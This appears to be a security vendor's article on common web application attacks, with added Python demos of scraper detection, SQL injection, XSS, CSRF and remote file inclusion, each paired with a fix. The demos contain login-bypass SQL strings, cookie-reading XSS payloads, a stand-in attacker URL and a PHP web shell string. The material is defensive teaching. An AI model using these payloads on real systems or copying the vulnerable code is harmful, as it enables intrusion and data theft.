Vulnerabilities in web applications can occur in several areas, including database administration tools (e.g., phpMyAdmin), SaaS applications, and content management systems such as WordPress. With web apps an integral part of business processes, an insecure web application is an easy target, and a compromise can result in damaged client relations, rescinded licenses, or even legal action.

Based on our experience, the nine vectors listed below (in no particular order) are commonly used by competitors and bad actors to steal data or disrupt your web applications. We’ve put together this list of the main web application threats that will help security teams—and CxOs—to plan strategies to counter such disruptions.

Web Scraping – Automated extraction of website data has legitimate uses, including market research and the crawling that search engines rely on for page ranking.

But there is a grey area in which illicit scrapers deploy bots to harvest your content, and the data behind it, at scale. In a competitive business category, bot operators can republish your site content elsewhere under their own name. E-commerce sites are especially exposed: it is not uncommon for scrapers to pull your catalog and pricing continuously so that a competing site can constantly underbid you.
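Scraping of this kind leaves a distinctive trace in the access log: one client walking catalog URLs in sequence, with no Referer, far faster than a shopper navigates. The detection below is an added example, not code from the original post or from Incapsula. It parses combined-format log lines and flags any client that, inside a sliding 60-second window, requests more than 25 pages of which at least 90% are product pages fetched with no Referer; the thresholds, the `/product/` path prefix, and the sample traffic are all constructed assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# One line of the combined log format:
# ip ident user [time] "method path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_log(lines):
    """Parse combined-format lines; lines that do not match are skipped."""
    entries = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            e = m.groupdict()
            e["ts"] = datetime.strptime(e["ts"], TS_FMT)
            entries.append(e)
    return entries


def flag_scrapers(entries, window=timedelta(seconds=60), max_hits=25, min_ratio=0.9):
    """Flag an IP when any window holds more than max_hits requests and at least
    min_ratio of them are catalog pages fetched with no Referer, i.e. the client is
    walking product URLs rather than navigating. Thresholds are assumptions chosen
    for this example; tune them against your own traffic."""
    by_ip = defaultdict(list)
    for e in entries:
        by_ip[e["ip"]].append(e)
    flagged = {}
    for ip, hits in by_ip.items():
        hits.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until the span fits inside `window`.
            while hits[end]["ts"] - hits[start]["ts"] > window:
                start += 1
            span = hits[start:end + 1]
            if len(span) <= max_hits:
                continue
            crawl_like = sum(1 for e in span
                             if e["path"].startswith("/product/") and e["referer"] == "-")
            if crawl_like / len(span) >= min_ratio:
                flagged[ip] = {"hits": len(span), "ua": hits[0]["ua"]}
                break
    return flagged


def _line(ip, ts, path, referer, ua):
    return '%s - - [%s] "GET %s HTTP/1.1" 200 5120 "%s" "%s"' % (
        ip, ts.strftime(TS_FMT), path, referer, ua)


def sample_log():
    """Constructed traffic: one shopper and one catalog scraper."""
    base = datetime(2017, 11, 20, 10, 0, 0, tzinfo=timezone.utc)
    shopper_ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/57.0"
    shopper = [("/", "-"), ("/category/shoes", "https://shop.example/"),
               ("/product/17", "https://shop.example/category/shoes")]
    lines = [_line("198.51.100.7", base + timedelta(seconds=40 * i), path, ref, shopper_ua)
             for i, (path, ref) in enumerate(shopper)]
    # The scraper walks product IDs once per second with no Referer.
    lines += [_line("203.0.113.9", base + timedelta(seconds=n), "/product/%d" % n, "-",
                    "python-requests/2.18.4") for n in range(40)]
    return lines
```

Run `flag_scrapers(parse_log(sample_log()))` and only the scraper's address comes back. A rate threshold alone would catch a busy legitimate user as well; it is the combination of rate, path pattern and missing Referer that separates crawling from browsing, and a real deployment would add user-agent reputation and JavaScript or cookie challenges on top.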

Backdoor Attack – A backdoor is malware, or a deliberately hidden access path, that bypasses normal login authentication to enter a system. Many organizations give employees and partners remote access to application resources, including file servers and databases; once a backdoor is planted on such a system, the attacker can run commands on it at will and keep the implant updated. The attacker's files are usually heavily obfuscated, which makes detection difficult.

We all heard about WannaCry, Petya, and Locky, among other ransomware families that emerged after 2010 and took over hundreds of thousands of computers around the world. While most of these attacks demanded a ransom from victims in exchange for recovering their data, some went further and also left backdoor access into the companies' systems.

SQL Injection (SQLI) – SQL injection occurs when user-supplied input is spliced into a database query, so that the input is interpreted as SQL rather than as data. It gives the attacker access to data your organization never intended to expose, such as internal company data, user databases, or customer information; in some cases records or whole tables can be modified or deleted, and the perpetrator may even be able to grant themselves administrative rights. Several SQL injection flaws were reported in 2017 against WordPress, Hetzner South Africa, and GoDaddy. The Equifax breach of the same year, which compromised around 145 million records, is often listed alongside them, though it was traced to an unpatched Apache Struts vulnerability rather than to SQL injection.
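The following is an added example, not code from the original post, showing the mechanism on a login query: the same statement built by string formatting and by parameter binding, run against a constructed in-memory SQLite table. The payloads are the two classic shapes, a comment marker that truncates the password check and a tautology that makes the WHERE clause true for every row. The table, accounts and payloads are assumptions made up for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed sample database. Passwords are stored in the clear only to keep
    the query-construction point visible; a real application stores hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
                 "password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("alice", "alice-pw", "admin"), ("bob", "bob-pw", "user")])
    return conn


def login_vulnerable(conn, username, password):
    """Splices the submitted fields into the SQL text, so the input can change the
    structure of the query rather than just the values it compares against."""
    query = ("SELECT username, role FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return sorted(conn.execute(query).fetchall())


def login_safe(conn, username, password):
    """Same query with bound parameters: the values travel separately from the SQL
    text, so quotes or comment markers inside them are never parsed as SQL."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return sorted(conn.execute(query, (username, password)).fetchall())


# Constructed payloads. The first comments out the password check for a chosen
# account ("alice' --"); the second turns the WHERE clause into a tautology.
COMMENT_PAYLOAD = ("alice' --", "anything")
TAUTOLOGY_PAYLOAD = ("' OR '1'='1", "' OR '1'='1")
```

With `login_vulnerable`, the first payload logs in as the admin account without a password and the second returns every user; `login_safe` returns nothing for either, because the driver compares the literal strings. Binding parameters is the fix; input filtering on its own is not, since the quoting rules differ per database and per context (identifiers and `ORDER BY` clauses cannot be bound at all and need an allowlist).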

Cross-Site Scripting (XSS) – Cross-site scripting is a common vector in which attacker-supplied script is injected into pages served by a vulnerable web application. Unlike other web attack types, such as SQLI, its target isn't your application's back end. Rather, it targets your users' browsers, which run the script with the privileges of your site, resulting in harm to your clients and to the reputation of your organization.

Reflected XSS – Reflected XSS attacks (a.k.a. non-persistent XSS) carry the malicious script inside the request itself, typically in a link the victim is lured into clicking. The request goes to a vulnerable website, possibly yours, which echoes the request parameter into its response without encoding it, so the victim's browser executes the script as if it came from your application.
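An added example, not code from the original post, covering both the general XSS point and the reflected case: a search page that echoes the `q` parameter into its response, first verbatim and then through context-appropriate HTML encoding. Two constructed payloads are included, one for the text context between tags and one that breaks out of a quoted attribute, since the attribute case is the one a naive `<`/`>` filter misses. The page layout and parameter name are assumptions.

```python
import html
from urllib.parse import parse_qs, urlsplit


def _query_param(url, name):
    """Return the first value of a query parameter, percent-decoded, or ''."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def render_search_vulnerable(url):
    """Reflects the search term straight into the HTML body and into an attribute."""
    q = _query_param(url, "q")
    return '<p>Results for: %s</p><input name="q" value="%s">' % (q, q)


def render_search_safe(url):
    """Same page with the term HTML-encoded; quote=True also encodes " and ' so the
    value cannot close the attribute it is placed in."""
    q = _query_param(url, "q")
    safe = html.escape(q, quote=True)
    return '<p>Results for: %s</p><input name="q" value="%s">' % (safe, safe)


# Constructed payloads, as they would appear in a link sent to the victim.
# Text context: injects a script element that exfiltrates the cookie.
BODY_PAYLOAD = "/search?q=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E"
# Attribute context: closes value="" and adds an autofocus handler; no < or > needed.
ATTR_PAYLOAD = "/search?q=%22%20onfocus%3D%22alert(1)%22%20autofocus%3D%22"
```

Rendering `ATTR_PAYLOAD` through the vulnerable function yields `value="" onfocus="alert(1)" autofocus=""`, which fires on page load; the safe version leaves `&quot; onfocus=&quot;...` inert inside the attribute. Encoding must match the output context (HTML body, attribute, JavaScript string, URL), and a Content-Security-Policy that disallows inline script is the usual second layer when a single encoding slip is expected.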

Cross-Site Request Forgery (CSRF) – Also known as XSRF, Sea Surf, or session riding, cross-site request forgery tricks the user's browser, while it is logged into your application, into sending a request the user never intended. Because the browser attaches the session cookie automatically, the request arrives fully authorized: a CSRF can transfer funds, change a password or e-mail address, or alter business data. It does not hand the attacker the session cookie itself, and the attacker normally cannot read the response; the damage is in the state change.
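The standard defense is a synchronizer token the server embeds in its own forms and checks on every state-changing request; a page on another origin cannot read it, so a forged request arrives with the cookie but without the token. The handler below is an added example, not code from the original post, with the token bound to the session by an HMAC so one user's token cannot be replayed against another's session. The secret, session identifiers and form fields are assumptions.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret; an assumption for this example, loaded from config in practice.
SECRET = b"constructed-server-side-secret"


def issue_csrf_token(session_id, secret=SECRET):
    """Token = random nonce plus an HMAC binding that nonce to this session."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, ("%s:%s" % (session_id, nonce)).encode(),
                   hashlib.sha256).hexdigest()
    return nonce + "." + mac


def verify_csrf_token(session_id, token, secret=SECRET):
    """Recompute the HMAC for this session and compare in constant time."""
    if not isinstance(token, str) or "." not in token:
        return False
    nonce, mac = token.split(".", 1)
    expected = hmac.new(secret, ("%s:%s" % (session_id, nonce)).encode(),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def handle_transfer(session_id, form):
    """State-changing POST handler. session_id comes from the session cookie, which
    the browser attaches to a forged cross-site request just as readily as to a real
    one; the token in the form body is what the forged request cannot supply."""
    if not verify_csrf_token(session_id, form.get("csrf_token")):
        return 403, "missing or invalid CSRF token"
    return 200, "transferred %s to %s" % (form["amount"], form["to"])
```

A forged form submission from another site reaches `handle_transfer` with a valid session but no token and is refused; the application's own form, which rendered `issue_csrf_token(session_id)` into a hidden field, is accepted. In current browsers the `SameSite=Lax` cookie attribute and an Origin header check on POSTs are cheap additional layers, but the token remains the check that does not depend on client behaviour.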

Man in the Middle Attack (MITM) – A man in the middle attack occurs when a bad actor positions themselves between your application and an unsuspecting user, relaying traffic in both directions. MITM can be used for passive eavesdropping or for active impersonation of either side, and in both cases nothing appears amiss to the user. Meanwhile, account credentials, credit card numbers, and other personal information can be harvested by the attacker, which is why every connection to your application should be protected by TLS with a valid certificate.

Phishing Attack – Phishing continues to be a favorite of social engineering practitioners. Like MITM, it can be set up to steal user data such as credit card and login information. The perpetrator, posing as a trustworthy entity, fools the victim into opening an email, text message, or instant message and then entices them to click a link that hides a payload. Such an action can cause malware to be installed surreptitiously, ransomware to lock the user's PC, or sensitive data to be handed over. One of the best-known examples is the Target data breach, which exposed more than 40 million payment cards during the 2013 holiday season. The simplicity of this attack was that it only required stealing the credentials of a third-party contractor responsible for Target's HVAC systems. To perform remote maintenance on the air conditioners, the contractor had access to Target's contractor network, and once that account was compromised the perpetrator had the same access.

Remote File Inclusion (RFI) – Remote file inclusion exploits weaknesses in web applications that dynamically include scripts based on user-supplied input. By pointing such an include at a URL they control, the attacker has the server fetch and execute their own code, which can give them complete control of the host.
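The include pattern and its fix, as an added example that is not code from the original post. The vulnerable function models PHP's `include($_GET['page'])` with remote includes enabled: a URL is fetched from whatever host it names and anything else is opened from disk, and the text it returns is what the interpreter would go on to execute. The safe version maps the parameter through an allowlist and then verifies the resolved path still lies under the template directory, which closes the local traversal variant as well. The directory layout, page names and the stubbed fetch are constructed assumptions so the example runs offline.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import urlsplit
from urllib.request import urlopen

# Allowlist from the public "page" value to a file inside the template directory (assumption).
ALLOWED_PAGES = {"home": "home.html", "about": "about.html"}


def default_fetch(url):
    return urlopen(url, timeout=5).read().decode()


def include_vulnerable(page, base_dir, fetch=default_fetch):
    """Models include($_GET['page']) with allow_url_include on: a URL is fetched from
    the remote host, anything else is read from disk relative to base_dir."""
    if urlsplit(page).scheme in ("http", "https", "ftp"):
        return fetch(page)
    return Path(base_dir, page).read_text()


def include_safe(page, base_dir):
    """Allowlist lookup, then a containment check on the resolved path so that even a
    bad allowlist entry cannot reach outside the template root."""
    filename = ALLOWED_PAGES.get(page)
    if filename is None:
        raise ValueError("unknown page: %r" % page)
    root = Path(base_dir).resolve()
    target = (root / filename).resolve()
    if root not in target.parents:
        raise ValueError("include escapes the template directory")
    return target.read_text()


def demo():
    """Constructed layout: templates/home.html plus a config file one level up.
    The remote fetch is stubbed with attacker-chosen content so nothing leaves the host."""
    top = tempfile.mkdtemp()
    tpl = os.path.join(top, "templates")
    os.mkdir(tpl)
    Path(tpl, "home.html").write_text("<h1>home</h1>")
    Path(top, "config.php").write_text("db_password=hunter2")
    attacker_code = "<?php system($_GET['cmd']); ?>"
    results = {
        "rfi": include_vulnerable("http://attacker.example/shell.txt", tpl,
                                  fetch=lambda url: attacker_code),
        "lfi": include_vulnerable("../config.php", tpl),
        "safe_home": include_safe("home", tpl),
        "rejected": [],
    }
    for bad in ("http://attacker.example/shell.txt", "../config.php", "home.html"):
        try:
            include_safe(bad, tpl)
        except ValueError:
            results["rejected"].append(bad)
    return results
```

`demo()` shows the vulnerable include returning the attacker's web shell for the URL and the config file for the `../` path, while the safe include serves only `home` and rejects the URL, the traversal, and even the bare filename that is not an allowlist key. On PHP hosts the platform-level companion to this is `allow_url_include=Off` (and `allow_url_fopen=Off` where the application permits it).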

Each web app vulnerability is different as are its mitigation solutions. Visit our Web Application Security page to learn more about how to mitigate each type of attack we covered. Web application assaults are prevalent but you can take action to prevent them.

